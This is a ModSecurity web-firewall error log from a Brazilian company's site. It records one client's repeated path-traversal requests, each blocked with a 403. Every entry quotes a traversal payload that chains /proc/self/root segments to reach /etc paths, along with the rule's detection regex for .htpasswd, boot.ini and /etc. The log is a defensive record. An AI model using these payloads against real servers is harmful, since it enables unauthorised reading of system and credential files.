[Fri Mar 20 03:37:51.887150 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:56370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrPhCii7xarUs8iHYylgAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:37:54.255209 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.243.128:41862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrQvXLqtnMIWvjpaJnjgAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:37:57.548093 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:41878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrRTJ3M9BSuKP7CAbeWAAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:37:59.929576 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.243.128:41894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrRzJ3M9BSuKP7CAbeXAAAAJI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:01.221604 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.243.128:46340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrSfHIg5MgXLBnicPKXQAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:03.787588 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:46354] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrS-oXxyEfFpUF8f9SZwAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:05.017328 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.243.128:46356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrTbninkcc-iUj5AosUwAAA4Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:06.411542 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:46362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrTvqxLDW4GITHUkSwawAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:09.766198 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:46374] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrUda6ubjKNq_cu4ac6QAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:13.120564 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:40904] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrVfqxLDW4GITHUkSwbwAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:14.371024 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:40918] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrVuoXxyEfFpUF8f9ScAAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:15.766947 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.243.128:40934] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrVwF0L0L-SsrnPo42dwAAAsg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:19.039598 2026] [:error] [pid 31215:tid 140411641214720] [client 74.7.243.128:40948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrWQF0L0L-SsrnPo42egAAAsw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:22.465147 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.243.128:55128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrXvXLqtnMIWvjpaJnrAAAApg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:24.099545 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.243.128:55128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrYPXLqtnMIWvjpaJnrwAAAo8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:26.456613 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:55132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrYvqxLDW4GITHUkSwcgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:27.771683 2026] [:error] [pid 9818:tid 140411658000128] [client 74.7.243.128:55144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrY11pVZ5mVmJwsFMAFQAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:29.075352 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.243.128:55156] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrZTJ3M9BSuKP7CAbeZQAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:30.359684 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.243.128:34538] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrZvXLqtnMIWvjpaJnvQAAApU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:35.897384 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:34546] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzra9a6ubjKNq_cu4ac8wAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:38.208275 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:34556] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrbvqxLDW4GITHUkSwdgAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:38:39.512092 2026] [:error] [pid 31215:tid 140411565680384] [client 74.7.243.128:54724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzrbwF0L0L-SsrnPo42ggAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
